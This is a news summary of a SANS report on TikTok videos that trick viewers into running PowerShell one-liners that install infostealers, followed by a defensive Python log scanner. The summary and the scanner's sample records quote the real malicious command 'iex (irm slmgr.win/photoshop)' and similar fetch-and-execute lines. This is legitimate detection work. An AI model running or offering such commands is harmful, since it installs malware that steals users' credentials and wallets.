Overview
- Security researcher Xavier Mertens of the SANS Internet Storm Center flagged viral TikTok videos that pose as guides to unlock paid software but instead deploy information-stealing malware.
- Creators instruct viewers to copy and run PowerShell one-liners such as iex (irm slmgr.win/photoshop), which pull code from attacker-controlled servers (Invoke-RestMethod) and execute it in place (Invoke-Expression).
- Identified payloads include Aura Stealer, with reports also citing families like Vidar and StealC, capable of extracting credentials, session cookies, and cryptocurrency wallet access while potentially granting system control.
- Reports note AI-styled narration and polished production that heighten credibility, with the short-form format helping the scams rack up thousands of views and reach younger users.
- Experts advise never executing unknown commands; anyone who has already run one should immediately change all passwords, run a full antivirus scan, enable two-factor authentication, disconnect from sensitive networks if needed, and report the videos to TikTok. No platform-wide takedown has been reported.
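As an added example (not code from the SANS post or the reports summarized above), the following Python scans PowerShell script-block log records for the shape of the one-liner quoted above: a web fetch whose result is handed to Invoke-Expression. The log line format, the alias table, the hostnames and the sample records are constructed assumptions.

```python
import re

# Aliases Windows PowerShell resolves to the cmdlets used in download-and-execute chains.
# Assumption: built-in aliases of Windows PowerShell 5.1 (curl/wget are not aliases in PowerShell 7).
ALIASES = {"iex": "Invoke-Expression", "irm": "Invoke-RestMethod", "iwr": "Invoke-WebRequest",
           "curl": "Invoke-WebRequest", "wget": "Invoke-WebRequest"}
# Names that fetch remote content; DownloadString covers the .NET WebClient variant.
FETCH_NAMES = {"invoke-restmethod", "invoke-webrequest", "downloadstring"}
EXEC_NAME = "invoke-expression"
TOKEN_RE = re.compile(r"[A-Za-z][A-Za-z-]*")
# Remote host: a URL with scheme, or a bare domain whose TLD is lowercase (so 'Net.WebClient' is skipped).
HOST_RE = re.compile(r"(?:https?://)?([A-Za-z0-9.-]+\.[a-z]{2,})(?:/[^\s)'\"]*)?")

def normalize(cmd: str) -> str:
    """Expand aliases so 'iex (irm host/x)' and its long form produce the same tokens."""
    return TOKEN_RE.sub(lambda m: ALIASES.get(m.group(0).lower(), m.group(0)), cmd)

def classify(cmd: str):
    """Return a finding when a command both fetches remote content and feeds it to Invoke-Expression."""
    norm = normalize(cmd)
    names = {t.lower() for t in TOKEN_RE.findall(norm)}
    if EXEC_NAME not in names or not (names & FETCH_NAMES):
        return None  # plain downloads and ordinary cmdlets are not flagged
    m = HOST_RE.search(norm)
    return {"remote_host": m.group(1) if m else None, "normalized": norm}

# Constructed sample records in the shape of PowerShell script-block log exports (Event ID 4104).
SAMPLE_LOG = [
    "WS01 alice ScriptBlockText=Get-ChildItem C:\\Users\\alice\\Documents",
    "WS01 alice ScriptBlockText=iex (irm slmgr.win/photoshop)",
    "WS02 bob ScriptBlockText=Invoke-WebRequest https://example.org/report.csv -OutFile r.csv",
    "WS03 carol ScriptBlockText=Invoke-Expression (Invoke-WebRequest http://example.net/x).Content",
    "WS04 dave ScriptBlockText=(New-Object Net.WebClient).DownloadString('http://example.com/a.ps1') | iex",
]

def scan_log(lines):
    """Run classify() over each record and attach host and user to every finding."""
    findings = []
    for line in lines:
        host, user, rest = line.split(" ", 2)
        finding = classify(rest.partition("ScriptBlockText=")[2])
        if finding:
            findings.append({"host": host, "user": user, **finding})
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['host']} {f['user']}: download-and-execute chain to {f['remote_host']}")
```

Alias expansion is what makes the short and long forms match; a rule that only looks for the literal string "iex" misses the spelled-out variant.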